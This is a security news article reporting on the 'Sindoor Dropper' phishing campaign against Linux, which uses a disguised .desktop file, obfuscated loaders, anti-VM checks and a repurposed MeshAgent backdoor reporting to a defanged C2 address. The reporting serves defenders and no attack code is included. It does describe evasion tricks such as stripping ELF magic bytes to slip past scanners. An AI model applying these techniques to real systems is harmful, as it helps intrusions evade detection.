Redazione RHC : 18 September 2025 07:28
Linux systems are being targeted by a recent malware campaign, known as “Sindoor Dropper,” which uses advanced spear-phishing techniques and a complex infection process. Victims are tricked with lures related to the recent conflict between Pakistan and India, known as Operation Sindoor, into launching malicious files.
According to analysis of the Nextron system, once executed, it opens a benign PDF to maintain the illusion of legitimacy, while silently launching a complex and heavily obfuscated infection process in the background. This process is designed to evade both static and dynamic analysis: the initial payload, at the time of its discovery, had no detections on VirusTotal.
The distinguishing feature of this activity is its use of .desktopfile, a method previously associated with the APT36, also known as Transparent Tribe or Mythic Leopard, is an advanced persistent threat. The attack begins when a user opens a malicious .desktopfile, named “Note_Warfare_Ops_Sindoor.pdf.desktop,” which masquerades as a regular PDF document.
The decryptor, a UPX-compressed Go binary, is intentionally corrupted by removing its ELF magic bytes, likely to bypass security scans on platforms like Google Docs. The .desktopfile restores these bytes on the victim’s computer to make the binary executable again. The .desktopfile downloads several components, including an AES decryptor ( mayuw) and an encrypted downloader ( shjdfhd).
The final payload is a repurposed version of MeshAgent, a legitimate open-source remote administration tool. Once deployed, MeshAgent connects to a command and control (C2) server hosted on an Amazon Web Services (AWS) EC2 instance at wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx.
This starts a multi-step process in which each component decrypts and executes the next. The chain includes basic anti-VM checks, such as verifying adapter names and vendors, blacklisting specific MAC address prefixes, and checking machine uptime.
All strings within the droppers are obfuscated using a combination of Base64 encoding and DES-CBC encryption to further hinder analysis. This gives the attacker full remote access to the compromised system, allowing them to monitor user activity, move laterally across the network, and exfiltrate sensitive data, Nextron said.
The Sindoor Dropper campaign highlights an evolution in threat actors’ attack techniques, demonstrating a clear focus on Linux environments, which are less targeted by phishing campaigns.
Redazione